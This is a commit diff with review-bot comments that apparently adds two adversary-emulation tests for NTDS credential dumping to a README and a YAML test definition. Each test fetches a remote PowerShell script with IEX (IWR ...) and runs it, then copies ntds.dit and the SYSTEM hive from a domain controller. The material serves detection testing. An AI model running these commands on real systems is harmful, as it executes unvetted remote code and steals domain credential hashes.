Update T1003.003.md & T1003.003.yaml via UnderlayCopy (#3217)
@@ -36,6 +36,10 @@ The following tools and techniques can be used to enumerate the NTDS file and th
- [Atomic Test #9 - Create Volume Shadow Copy with diskshadow](#atomic-test-9---create-volume-shadow-copy-with-diskshadow)
- [Atomic Test #10 - Copy NTDS in low level NTFS acquisition via MFT parsing](#atomic-test-10---Copy-NTDS-in-low-level-NTFS-acquisition-via-MFT-parsing)
- [Atomic Test #11 - Copy NTDS in low level NTFS acquisition via fsutil](#atomic-test-11---Copy-NTDS-in-low-level-NTFS-acquisition-via-fsutil)
<br/>
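Review bot: the two new table-of-contents links (`#atomic-test-10---Copy-NTDS-in-low-level-NTFS-acquisition-via-MFT-parsing` and the matching `...-via-fsutil` one) keep the heading's mixed case, while the existing Test #9 link directly above them is all lowercase. GitHub generates heading anchors in lowercase, so these two links will not resolve; they should read `#atomic-test-10---copy-ntds-in-low-level-ntfs-acquisition-via-mft-parsing` and `#atomic-test-11---copy-ntds-in-low-level-ntfs-acquisition-via-fsutil`, which regenerating the README from the YAML rather than hand-editing it would produce.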
@@ -461,8 +465,76 @@ mkdir c:\exfil
diskshadow.exe /s #(unknown)
```
<br/>
## Atomic Test #10 - Copy NTDS in low level NTFS acquisition via MFT parsing
This test is intended to be run on a domain Controller.
UnderlayCopy is a PowerShell utility for low-level NTFS acquisition and dumping protected, locked system artifacts (for example: SAM, SYSTEM, NTDS.dit, registry hives, and other files that are normally inaccessible while Windows is running).
**Supported Platforms:** Windows
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| extract_path | Path for extracted NTDS.dit | path | C:\Windows\Temp|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/kfallahi/UnderlayCopy/refs/heads/main/UnderlayCopy.ps1' -UseBasicParsing)
Underlay-Copy -Mode MFT -SourceFile C:\Windows\NTDS\ntds.dit -DestinationFile #{extract_path}\ntds.dit
Underlay-Copy -Mode MFT -SourceFile C:\Windows\System32\config\SYSTEM -DestinationFile #{extract_path}\SYSTEM_HIVE
```
#### Cleanup Commands:
```powershell
remove-item "#{extract_path}\ntds.dit" -force -erroraction silentlycontinue
remove-item "#{extract_path}\SYSTEM_HIVE" -force -erroraction silentlycontinue
```
<br/>
## Atomic Test #11 - Copy NTDS in low level NTFS acquisition via fsutil
This test is intended to be run on a domain Controller.
UnderlayCopy is a PowerShell utility for low-level NTFS acquisition and dumping protected, locked system artifacts (for example: SAM, SYSTEM, NTDS.dit, registry hives, and other files that are normally inaccessible while Windows is running).
**Supported Platforms:** Windows
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| extract_path | Path for extracted NTDS.dit | path | C:\Windows\Temp|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/kfallahi/UnderlayCopy/refs/heads/main/UnderlayCopy.ps1' -UseBasicParsing)
Underlay-Copy -Mode Metadata -SourceFile C:\Windows\NTDS\ntds.dit -DestinationFile #{extract_path}\ntds.dit
Underlay-Copy -Mode Metadata -SourceFile C:\Windows\System32\config\SYSTEM -DestinationFile #{extract_path}\SYSTEM_HIVE
```
#### Cleanup Commands:
```powershell
remove-item "#{extract_path}\ntds.dit" -force -erroraction silentlycontinue
remove-item "#{extract_path}\SYSTEM_HIVE" -force -erroraction silentlycontinue
```
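Review bot: both README Attack Commands fetch the script from `refs/heads/main` (`IEX (IWR 'https://raw.githubusercontent.com/kfallahi/UnderlayCopy/refs/heads/main/UnderlayCopy.ps1' -UseBasicParsing)`), whereas the YAML hunk in this same commit declares a `script_url` input pinned to a specific commit. The README is generated from the YAML, so the command here should be `IEX (IWR #{script_url} -UseBasicParsing)` and the Inputs table should carry a `script_url` row; as written, anyone running from the README executes whatever the upstream main branch currently holds, which defeats the pinning and leaves the README and YAML describing different tests. Two smaller mismatches in the same region: `extract_path` is typed `path` in these tables but `string` in the YAML, and "domain Controller" should be "domain controller" in both descriptions.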
@@ -261,3 +261,58 @@ atomic_tests:
diskshadow.exe /s #(unknown)
name: command_prompt
elevation_required: true
- name: Copy NTDS in low level NTFS acquisition via MFT parsing
description: |
This test is intended to be run on a domain Controller.
UnderlayCopy is a PowerShell utility for low-level NTFS acquisition and dumping protected, locked system artifacts (for example: SAM, SYSTEM, NTDS.dit, registry hives, and other files that are normally inaccessible while Windows is running).
supported_platforms:
- windows
input_arguments:
extract_path:
type: string
default: C:\Windows\Temp
description: Path for extracted NTDS.dit
script_url:
description: URL to UnderlayCopy script
type: url
default: https://raw.githubusercontent.com/kfallahi/UnderlayCopy/37f2e9b76b724bc1211437b14deaf1e76b21791e/UnderlayCopy.ps1
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR #{script_url} -UseBasicParsing)
Underlay-Copy -Mode MFT -SourceFile C:\Windows\NTDS\ntds.dit -DestinationFile #{extract_path}\ntds.dit
Underlay-Copy -Mode MFT -SourceFile C:\Windows\System32\config\SYSTEM -DestinationFile #{extract_path}\SYSTEM_HIVE
name: powershell
elevation_required: true
cleanup_command: |
remove-item "#{extract_path}\ntds.dit" -force -erroraction silentlycontinue
remove-item "#{extract_path}\SYSTEM_HIVE" -force -erroraction silentlycontinue
- name: Copy NTDS in low level NTFS acquisition via fsutil
description: |
This test is intended to be run on a domain Controller.
UnderlayCopy is a PowerShell utility for low-level NTFS acquisition and dumping protected, locked system artifacts (for example: SAM, SYSTEM, NTDS.dit, registry hives, and other files that are normally inaccessible while Windows is running).
supported_platforms:
- windows
input_arguments:
extract_path:
type: string
default: C:\Windows\Temp
description: Path for extracted NTDS.dit
script_url:
description: URL to UnderlayCopy script
type: url
default: https://raw.githubusercontent.com/kfallahi/UnderlayCopy/37f2e9b76b724bc1211437b14deaf1e76b21791e/UnderlayCopy.ps1
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR #{script_url} -UseBasicParsing)
Underlay-Copy -Mode Metadata -SourceFile C:\Windows\NTDS\ntds.dit -DestinationFile #{extract_path}\ntds.dit
Underlay-Copy -Mode Metadata -SourceFile C:\Windows\System32\config\SYSTEM -DestinationFile #{extract_path}\SYSTEM_HIVE
name: powershell
elevation_required: true
cleanup_command: |
remove-item "#{extract_path}\ntds.dit" -force -erroraction silentlycontinue
remove-item "#{extract_path}\SYSTEM_HIVE" -force -erroraction silentlycontinue
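Review bot: the second test is named `Copy NTDS in low level NTFS acquisition via fsutil`, but its executor runs `Underlay-Copy -Mode Metadata` and its `description` is word-for-word the same as test #10's, never mentioning fsutil; a reader cannot tell what distinguishes the two tests or where fsutil enters. Either name the test after the mode it actually invokes or add a sentence to `description` stating how Metadata mode differs from MFT parsing. Both tests also say they are intended for a domain controller and read `C:\Windows\NTDS\ntds.dit`, yet carry no `dependencies` block with a `prereq_command` checking that the file exists, so on a non-DC host they fail inside `Underlay-Copy` instead of at a prerequisite check; `extract_path` is also typed `string` here but `path` in the README tables.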